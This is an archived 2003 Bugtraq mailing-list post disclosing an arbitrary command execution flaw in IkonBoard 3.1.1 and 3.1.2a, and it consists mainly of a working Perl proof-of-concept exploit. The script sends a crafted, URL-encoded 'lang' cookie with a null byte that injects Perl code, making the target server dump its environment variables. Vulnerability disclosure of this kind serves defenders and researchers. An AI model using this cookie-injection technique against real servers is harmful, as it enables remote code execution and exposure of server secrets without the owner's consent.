lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Wed, 17 Sep 2003 11:52:25 +0100 From: Nick Cleaton <nick@...aton.net> To: bugtraq@...urityfocus.com Subject: Exploit: IkonBoard 3.1.1/3.1.2a arbitrary command execution Here is a proof of concept exploit for an arbitrary command execution vulnerability in IkonBoard versions 3.1.1 and 3.1.2a. The exploit causes an IkonBoard installation on a remote web server to print out its environment. See also: http://www.securityfocus.com/archive/1/317234 http://www.securityfocus.com/archive/1/336598 ---------8<----------------8<----------------8<----------------8<---------- #!/usr/bin/perl -w use strict; my $HOST = 'www.example.com'; my $PORT = 80; my $PATH = '/cgi-bin/ikonboard.cgi'; my $HEAD = qq|"Content-type: text/plain\r\n\r\n"|; use IO::Socket; my $sock = IO::Socket::INET->new("$HOST:$PORT") or die "connect: $!"; my $val = qq|.\0"if print($HEAD,map"\$_ => \$ENV{\$_}\n",keys\%ENV)&&exit;#|; $val =~ s#(\W)# sprintf '%%%.2X', ord $1 #ge; $sock->print( "GET $PATH HTTP/1.1\r\n", "Host: $HOST\r\n", "Cookie: lang=$val\r\n", "Connection: close\r\n", "\r\n" ) or die "write: $!"; print while <$sock>; ---------8<----------------8<----------------8<----------------8<---------- -- Nick Cleaton nick@...aton.net
Powered by blists - more mailing lists